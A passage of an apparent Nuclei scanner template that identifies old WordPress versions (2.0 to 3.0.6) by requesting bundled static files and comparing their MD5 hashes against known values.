matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"4f0e869c8bcf84c92dd7f94a80739fb9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/more.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"dff3bc0a01a614b601b7826415bfe4ca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/page.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"ec8d1ed1b0fd137cacdda9e316ebed31\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/toolbars.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"33e46a907572061c981e459ae022b40d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/more_bug.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"c38cc928b95c0be49ec083648084d190\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/page_bug.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"32a68c86a6beffdd042abf0b0c595328\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/langs/en.js" - matchers: - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"bf0bb5872302fe477bc1512ea562e98b\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"1b2855b206fa83e79b040809db339eb3\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"26fdadca806efcef54b9485a8a76fd72\" == md5(body))" - - type: dsl - name: 2.0.4 - 2.0.11 - dsl: - - "(\"3fca13e910ad3f0282af47905a3ab868\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.1 - dsl: - - "(\"da5b27e2a8961d07f4900c6dc4807c75\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/wordpress.css" - matchers: - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"327263b7922359d6456d38a3dbdb33fe\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"008e05c3702eebe1730c58ad208a8520\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"f8dfd0c4d779272785ede08c83d1cb20\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/langs/en.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"a9c67a04e2d5c8f05b35256746c1547b\" == md5(body))" - - type: dsl - name: 2.0.4 - 2.0.11 - dsl: - - "(\"9acb9d10f3310515d46a592ec8722e09\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.1 - dsl: - - "(\"da427e0fb506e2e403dde16612f4f7ca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/box-butt-left.gif" - matchers: - - type: dsl - name: 2.0.4 - 2.3.3 - dsl: - - "(\"729c70ab984f1078ec91398ba55e0d05\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/box-head.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"87f02ca247ab3a0a631a5248b1da342d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/box-butt-right.gif" - matchers: - - type: dsl - name: 2.0.4 - 2.3.3 - dsl: - - "(\"f354e52a372a936e86212c7d76eb5620\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/box-head-right.gif" - matchers: - - type: dsl - name: 2.0.4 - 2.3.3 - dsl: - - "(\"0907b7ac6a357333357a0f12c0890d41\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/login-bkg-tile.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"fb31d6fa4de06f45e077be1a53dc9975\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/heading-bg.gif" - matchers: - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"99159ef1b8abd8b907abcba0de48d585\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/login-bkg-bottom.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"580bb0b7fade637e26f3860b87f32e3b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/box-bg-left.gif" - matchers: - - type: dsl - name: 2.0.4 - 2.3.3 - dsl: - - "(\"3bb60b3e953e96e70ebd07db595e3527\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/notice.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"b8c332ebadeb17298472c4ba3c009ccf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/box-head-left.gif" - matchers: - - type: dsl - name: 2.0.4 - 2.3.3 - dsl: - - "(\"f4e3d9071653ae7a841689be7c487333\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/toggle.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"f3653960e8f0ae4cdd7804f60c133f81\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/box-butt.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"df8848b32f98e52c08a29afca280d753\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/box-bg-right.gif" - matchers: - - type: dsl - name: 2.0.4 - 2.3.3 - dsl: - - "(\"7d5f2df59d28b587f741e4d285941067\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/box-bg.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"1f7174c8737cbd04837faf5e384013bd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/upload.css" - matchers: - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"b3503aa6a8fd1fe0996951232aedfd58\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/dbx-admin-key.js" - matchers: - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"9301b8c88339ada63969bf9c7592c805\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/link-cat.js" - matchers: - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"e312e9c4c47464e8484370c1ae680835\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.dimensions.min.js" - matchers: - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"47c86e764c9d5dec1a2929f06cd7464a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/popups.css" - matchers: - - type: dsl - name: 2.1 - 2.5.1 - dsl: - - "(\"b548e47b5fef91f0a2ac405e0d2bde23\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/tar.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"f214503adb3d0946bf0f78a6fb815531\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/text.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"d64f782215bff7917a77309ddb8ca739\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/doc.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"8c7bcb970b8dd6bffdb162e153b148b6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/exe.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"c1dd9f17509fb7bf683fd1faf1a60b17\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/zip.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"99fbe6255f4fddf2f85467ed26d38ee8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/video.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"d7086fb6dd56f54333b273eca67eee80\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/css.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"33dbb7b35ac859049fadec238f20b6dd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/default.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"0dab7bf1ca21c5c0187b8cce6a4beddb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/swf.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"66aaea9de851ee5d375b64a7cb621589\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/pdf.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"65d6fc1f8c488839ed18da9542002271\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/audio.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"a0fe1ae5c188baadbba60db814bdcf2b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/js.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"cd985c7f9dc16f22b6a089162f9f9b49\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/html.png" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"56971a813ffec45a9caac9fa0820ba5f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/readme.txt" - matchers: - - type: dsl - name: 2.0 - 2.6.5 - dsl: - - "(\"fe81b122bcf0e8599bb841cca33f967a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/tiny_mce_ext.js" - matchers: - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"5e97d9bfadfbaabaa0b26b61c45a400d\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"5c90444da969c6153d334429897306b1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/comment-stalk-fresh.gif" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"15674fa43f78721d5b3ad896dc00aaf1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/comment-stalk-classic.gif" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"c2ff7e39c4531f19f7cca9e1c173664f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/tab.png" - matchers: - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"66dc0e9e049f03a553edef7050a25ef7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/media-buttons.gif" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"61c46617871c3d07bf3e6a82488776fc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/gear.png" - matchers: - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"2e7caff6bd79185a893c8f2d71a2bf85\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/comment-pill.gif" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"42b039a8868185213bfa6b5a0c71f563\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/comment-stalk-rtl.gif" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"a1a86519bed554d2e9e4af526c642e25\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/media-button-gallery.gif" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"d2dddcf3d5a7553c246e967d3c149fc5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/tail.gif" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"b93de208dc82124aab27a0300cef5816\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/press-this-ie.css" - matchers: - - type: dsl - name: 2.6.2 - 2.6.5 - dsl: - - "(\"1ffbb45a7cc8a96c335ba18973704905\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.1 - dsl: - - "(\"e9129420be8a404147faf2a2de4fc9e9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/upload-rtl.css" - matchers: - - type: dsl - name: 2.3 - 2.6.5 - dsl: - - "(\"c9106b5fd9fa57f1151e8eede647aef1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/upload.js" - matchers: - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"44433c60fe6569e064febe62096bc9a5\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"bca00b7ab1d7a535f30aec6489fa4e1c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/swfupload_f9.swf" - matchers: - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"8ee900948d38bbcdd1a10c7b3221cce6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.documentready.js" - matchers: - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"9cbece0f8f4192b636f5484d4ddf63cc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.graceful_degradation.js" - matchers: - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"57901feb399ab92498cbe8ef193bf832\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/css/blank.css" - matchers: - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"c15c875a4c54efa8554bca63aee6ecb9\" == md5(body))" - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"e873e4b2d1c926891df13afca4f73e49\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/css/pasteword.css" - matchers: - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"2042313f6628ef2b742c74aba0fd9b60\" == md5(body))" - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"e1dfc4d39541876eae65975a6febf6cc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/editor_plugin.js" - matchers: - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"f54e4df3a63237afd7471c95d8484f6e\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"0b28d9f27e1f3c8d817aeb31bcb352af\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"a4394be567c66e0cfb88b32cb6369a85\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"f85d3b49bea0be6fdfb9b0fc8c76140c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/utils/mclayer.js" - matchers: - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"8885fea7b48a56b5e50e7c7368122f2f\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"70718596a2b1f3dc07b83cf1ca0a22b9\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"e4572e78780966da5d48445a63ddd226\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/users.js" - matchers: - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"0c2b99ed1de562e31325078f398d3189\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"d9f70a2fc3218dd1e7dc47d397d37d36\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"ef8872688bcab72a712e681b5bdd0c36\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/slug.js" - matchers: - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"6856b5d635ea0863e4a0531df329c8ae\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"8d05ddd4fed8e7fc5bd6a9aa254184c2\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"60d61478be0a8c0178fffeefac7c4feb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/slug.dev.js" - matchers: - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"216b3181cccbf143cef4cae1d09dcb1d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/page.js" - matchers: - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"d8613d8d5318ca18f488428db7e0d97f\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"5f4e644bb3e0efe9b40e562cd9662bbd\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"d345cbe714be44a04d926a9e470782c7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/page.dev.js" - matchers: - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"d94c023c0c18b0900218f78b9aad9d3b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/scriptaculous/prototype.js" - matchers: - - type: dsl - name: 2.5 - 2.9.2 - dsl: - - "(\"bab4179aef164e96e866b03ac432bdf7\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"3766aeff5778b54f74f93670322ca0df\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"ed2d6608b0832c5e990e10729157b485\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"e4d323d8dfe7260fe01cefe6143f094d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/engines/gecko.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"7c956d369c49985b58dd290d34582219\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/engines/opera.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"f74fa89f8ad2fb9a181a208f10da7b85\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/engines/msie.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"f3b838bc550dc9bc558227fafce84533\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/codepress.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"aa0c74b76c8cc60de8737d59cb0e7cdf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/images/line-numbers.png" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"a76c9f4012abdcc34f6a5f7e5a192a8e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/html.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"7c2c3977b42d65c155c8478d7b6daf51\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/csharp.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"83dca53adedd600821680a056d250d52\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/sql.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"02f092e68dc9db24938f5eeb3d5c8567\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/css.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"aa387749d0225b801966586cb3440feb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/javascript.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"dcf899b8e094d6ce00f862ccd29cd757\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/java.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"12bc23938841da78e58634abf6496878\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/asp.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"26687456026882c672818c7ecb60a15a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/java.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"790af578062b6477d836e3fb2a7649c0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/autoit.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"8d361eab73d9102e860ffefe4e4f8c6a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/html.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"fb2ded83464c3fe2f1e5b637040a3a94\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/javascript.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"4d5da44c9fa9ecadf7798348216e9ffb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/text.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"abaac598019c3320c840d668e3e51f29\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/vbscript.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"73dca79fa86f18c94570e0e1cfc62aae\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/autoit.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"d41bb2cf55d7c5c7e47dfe3e4d86db0b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/perl.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"dfb384ec9b7e486a00395c1e770a34f9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/ruby.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"91e8cd2f56bca1c8f494b3be0625a0d6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/text.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"870cfa7de88e106a459a97e65cbe4663\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/php.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"62832f855a526454f812e8b67ad826e6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/css.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"7c645111eabe8877ad347cee16e592bf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/csharp.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"983220b0ee96cb5b166de574ad989d93\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/vbscript.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"26687456026882c672818c7ecb60a15a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/ruby.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"271da30b0a22637d4c255abb60644870\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/xsl.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"07599e630b9c2c13da05e32cddc0033e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/xsl.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"9c7b6a5314b3cee0810447d6f65156e9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/generic.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"8ab6d398feb9e9c1c77525143f05ec74\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/sql.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"0dba07c9dc503965d361f900d3eac5a1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/generic.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"e971d7976986a2fb16f492975170bb22\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/asp.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"2d4b45ac584d7baa65fd044b523161c6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/php.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"9b73eec0ab489d7cd832fc01dac0d448\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/languages/perl.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"e98daf8aeacba58424d112e3f6e593c8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/codepress.css" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"9ac88960aa13b291891f128267233040\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/license.txt" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"adc05bf63f3776f4f7c2950825b770a9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codepress/codepress.html" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"930e281d2080dfe3e2d1cacedca458d7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/interface.js" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"6bc3151d1902096d20d92f6042f85757\" == md5(body))" - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"6d4f57b9e6ac9be29d676f255f42af5b\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"847407c01f884853efd73974931e2195\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/rtl.dev.css" - matchers: - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"f8e96e1e87c798f8163b951a06401179\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/browse-happy.gif" - matchers: - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"3bad5ccecc83f7e368c79bc7f961e337\" == md5(body))" - - type: dsl - name: 2.0 - 2.6.5 - dsl: - - "(\"119997784c78f5b652718aa83d91f0d6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/fav-top.png" - matchers: - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"6d51aeeb995d529ea74d3339c8fd826b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wp-logo.gif" - matchers: - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"797be4dafa9e042735e030df67ec0f26\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/screen-options-left.gif" - matchers: - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"1f4510095793f25a12c376f136429880\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/wp-logo-vs.gif" - matchers: - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"4a094808ccb90b388ac92611d6e9e365\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/wp-gears.dev.js" - matchers: - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"d97f6085669659c709b6e285ae9ce98a\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"56bb1aec2083a149e8b0dbab78eccdf2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/safari/editor_plugin.js" - matchers: - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"9bf27e117e423eea7754fb6e471276ee\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"9d7a37a26a6773ae236ed7a75f4617da\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"e22fe4b5a129c551ebbb856f1f3f31e2\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"c079c4b2c39f0bc31b4e6350db2ca4aa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/safari/blank.htm" - matchers: - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"c9a4909a579f24cd23fc0ae847e06241\" == md5(body))" 